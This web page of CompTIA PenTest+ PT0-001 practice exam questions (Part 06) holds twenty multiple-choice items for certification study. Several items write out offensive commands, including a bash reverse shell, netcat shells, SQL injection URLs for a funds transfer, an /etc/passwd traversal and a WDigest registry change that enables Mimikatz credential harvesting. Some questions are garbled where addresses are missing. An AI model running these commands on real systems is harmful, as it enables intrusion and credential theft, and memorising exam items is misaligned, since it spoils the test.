Last Updated on July 9, 2021 by InfraExam

PT0-001 : CompTIA PenTest+ Certification Exam : Part 06

  1. A penetration tester has performed a pivot to a new Linux device on a different network. The tester writes the following command:

    for m in {1..254..1};do ping -c 1 192.168.101.$m; done

    Which of the following BEST describes the result of running this command?

    • Port scan
    • Service enumeration
    • Live host identification
    • Denial of service
  2. A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of Which of the following commands will test if the VPN is available?

    • fpipe.exe -1 8080 -r 80
    • ike-scan -A -t 1 --sourceip=spoof_ip
    • nmap -sS -A -f
    • nc 8080 /bin/sh
  3. A penetration tester ran the following Nmap scan on a computer:

    nmap -aV

    The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH. Which of the following is the BEST explanation for what happened?

    • The organization failed to disable Telnet.
    • Nmap results contain a false positive for port 23.
    • Port 22 was filtered.
    • The service is running on a non-standard port.
  4. Which of the following has a direct and significant impact on the budget of the security assessment?

    • Scoping
    • Scheduling
    • Compliance requirement
    • Target risk
  5. After several attempts, an attacker was able to gain unauthorized access through a biometrics sensor using the attacker’s actual fingerprint without exploitation. Which of the following is the MOST likely explanation of what happened?

    • The biometric device is tuned more toward false positives.
    • The biometric device is configured more toward true negatives.
    • The biometric device is set to fail closed.
    • The biometric device duplicated a valid user’s fingerprint.
  6. A penetration tester is performing initial intelligence gathering on some remote hosts prior to conducting a vulnerability scan.

    The tester runs the following command:

    nmap -D,, -sV -o --max-rate 2

    Which of the following BEST describes why multiple IP addresses are specified?

    • The network is subnetted as a/25 or greater, and the tester needed to access hosts on two different subnets.
    • The tester is trying to perform a more stealthy scan by including several bogus addresses.
    • The scanning machine has several interfaces to balance the scan request across at the specified rate.
    • A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the latter host.
  7. Joe, an attacker, intends to transfer funds discreetly from a victim’s account to his own. Which of the following URLs can he use to accomplish this attack?

    •’OR 1=1 AND select username from testbank.custinfo where username like ‘Joe’−&amount=200
    •’OR 1=1 AND select username from testbank.custinfo where username like ‘Joe’ &amount=200
    •’OR 1=1 AND select username from testbank.custinfo where username like ‘Joe’ −&amount=200
    •’AND 1=1 AND select username from testbank.custinfo where username like ‘Joe’ −&amount=200
  8. After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to remediate the use of common dictionary terms?

    • Expand the password length from seven to 14 characters.
    • Implement password history restrictions.
    • Configure password filters/
    • Disable the accounts after five incorrect attempts.
    • Decrease the password expiration window.
  9. A penetration tester has been asked to conduct OS fingering with Nmap using a company-provided text file that contains a list of IP addresses. Which of the following are needed to conduct this scan? (Choose two.).

    • -O
    • -iL
    • -sV
    • -sS
    • -oN
    • -oX
  10. A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL:

    Which of the following attack types is MOST likely to be the vulnerability?

    • Directory traversal
    • Cross-site scripting
    • Remote file inclusion
    • User enumeration
  11. A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:

    – Code review
    – Updates to firewall settings

    Which of the following has occurred in this situation?

    • Scope creep
    • Post-mortem review
    • Risk acceptance
    • Threat prevention
  12. At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?

    • Enumeration of services
    • OSINT gathering
    • Port scanning
    • Social engineering
  13. During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to impersonate network resources and collect authentication requests?

    • Ettercap
    • Tcpdump
    • Responder
    • Medusa
  14. Given the following:…/…/…/etc/passwd

    Which of the following BEST describes the above attack?

    • Malicious file upload attack
    • Redirect attack
    • Directory traversal attack
    • Insecure direct object reference attack
  15. A tester intends to run the following command on a target system:

    bash -i >& /dev/tcp/ 0> &1

    Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?

    • nc -nlvp 443
    • nc 443
    • nc -w3 443
    • nc -e /bin/sh 443
  16. During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.

    Which of the following registry changes would allow for credential caching in memory?

    • reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 0
    • reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
    • reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
    • reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
  17. Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?

    • set rhost
    • run autoroute -s
    • db_nmap -iL /tmp/privatehosts.txt
    • use auxiliary/server/socks4a
  18. A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?

    • Advanced persistent threat
    • Script kiddie
    • Hacktivist
    • Organized crime
  19. Click the exhibit button.

    PT0-001 Part 06 Q19 015
    PT0-001 Part 06 Q19 015

    A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?

    • SNMP brute forcing
    • ARP spoofing
    • DNS cache poisoning
    • SMTP relay
  20. A recently concluded penetration test revealed that a legacy web application is vulnerable to SQL injection. Research indicates that completely remediating the vulnerability would require an architectural change, and the stakeholders are not in a position to risk the availability on the application. Under such circumstances, which of the following controls are low-effort, short-term solutions to minimize the SQL injection risk? (Choose two.)

    • Identity and eliminate inline SQL statements from the code.
    • Identify and eliminate dynamic SQL from stored procedures.
    • Identify and sanitize all user inputs.
    • Use a whitelist approach for SQL statements.
    • Use a blacklist approach for SQL statements.
    • Identify the source of malicious input and block the IP address.